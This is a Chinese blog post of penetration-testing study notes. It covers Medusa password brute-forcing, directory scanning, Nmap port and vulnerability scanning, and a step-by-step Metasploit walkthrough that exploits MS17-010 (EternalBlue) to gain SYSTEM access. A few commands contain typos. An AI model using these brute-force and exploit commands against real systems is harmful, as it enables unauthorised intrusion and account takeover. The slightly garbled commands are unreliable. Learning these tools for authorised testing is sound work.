9.26 扫描工具

 

美杜莎medusa 开源的,支持的服务有很多种,ftpsshmssqlmysqlsnmp等等

kali系统中内置有。

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

例如Medusa -h 123.123.12.1 -P /root/top1000.txt -M ftp -e ns -t 20 -f -r 0 -O ./result_ftp.txt

-h 爆破的主机ip

-H ip集合

-u 用户名

-U 用户字典

-p 单个密码

-P 密码字典

-C 组合条目文件username:password

-M 模块

-O 输出list

-e ns  e表示制定策略爆破,n表示空密码 s表示密码用户名相同

-n 端口

-t 线程数

-f 找到正确账户密码终止

-r 重试间隔时间

-d 显示所有模块的名称

 

 

目录扫描:扫描站点的目录,寻找敏感文件(目录名、探针文件、后台、robots.txt、备份文件等)

目录:站点结构,权限控制不严格

探针文件:服务器配置信息,phpinfo.php redme.txt config.txt

后台:管理整个网站的入口,inurl:admin.php

robots.txt:一般存放在站点根目录,如果管理员对robots.txt文件不合理管理就会造成信息泄露

备份文件:数据库备份、网站备份文件(xxxx.bakxxxx.zipxxxx.rar之类的格式)

御剑后台扫描工具

DirBuster

Nmap最早是linux中的扫描和嗅探工具,网络连接扫描工具,主要探测主机存活(是否开机)、开启服务(扫端口)、安全性问题(高级用法)、系统类型(OS类型)

Nmap的安装、配置环境变量

用法:(明令行模式)

nmap -h 帮助信息

nmap 123.123.12.1 扫描单个ip

状态:

Open 开启

Close 关闭

filtered 被过滤、探测包被拦截,无法定位端口是否开启

Unfiltered 未来=过滤,探测包没有被拦截,只是nmap无法判断该端口是否开启

open|filtered 开启或者被过滤的

close|filtered 关闭或者被过滤的

nmap 123.123.12.1/24扫描整个网段

nmap 123.123.12.1-200扫描指定的网络

nmap 123.123.12.1,100,200-230扫描.1 .100.200-230之间的网络

nmap 123.123.12.0/24 10.10.10.0/24 扫描不同网段

nmap -iL filename 扫描目标文件

nmap -iR 随机选择目标去探测 eg:nmap -sS -PS80 iR 0(无休止的去扫描)-p80

nmap 123.123.12.0/24  --exclude 123.123.12.10,255,20-30  排除某些IP去扫描

 

 

带有参数的扫描

 

nmap -sT 192.168.1.1 使用TCP全连接的方式,扫描过程需要三次握手去建立连接,建立成功,则端口开放。扫描速度慢

 

nmap -sS 192.168.1.1 使用SYN的数据包去检测,需要接受ACK,则说明端口开放了

 

nmap -sN 192.168.1.1 NULL扫描,发出的数据包不设置任何标识位

 

注意:上述扫描的端口默认都是1-1000

 

-p后跟指定的端口 -p20,21,22,3306  -p- = -p1-65536

 

nmap -sV 192.68.1.1探测服务版本

 

nmap 192.168.1.1 >./re.txt

 

nmap 192.168.1.1 -oX re.html

 

nmap -A 192.168.1.1获取目标所有详细结果,全面扫描

 

nmap -O 192.168.1.1探测操作系统的类型

 

 

 

--script 使用脚本去探测漏洞

 

nmap --script smb-vuln-ms17-010 192.168.1.1  永恒之蓝

 

nmap --script smb-check-vulns 192.168.1.1  MS08-067

 

nmap --script ssl-heartbleed 192.168.1.1  心脏滴血

 

 

 

使用MSF通过MS17-010获取系统权限

 

Step1:开启postgressql数据库 /etc/init.d/postgressql start

 

Step2: msfconsole进入MSF

 

search 17-010 搜索cve17-010相关的exp

 

auxiliary/scanner/smb/smb_ms17_010扫描漏洞是否存在

 

exploit/windows/smb/ms17_010_enternalblue用来攻击的exp

 

Step3

 

探测漏洞是否存在

 

use auxiliary/scanner/smb/smb_ms17-010

 

Set rhosts 10.10.10.0/24

 

Exploit

 

Step4:实施攻击

 

use exploit/windows/smb/ms17_010_eternalblue

 

Set shorts 10.10.10.12

 

Exploit

 

Step5:攻击成功之后就能到目标的system权限

 

posted @ 2019-09-26 17:32  黑空  阅读(276)  评论(0编辑  收藏  举报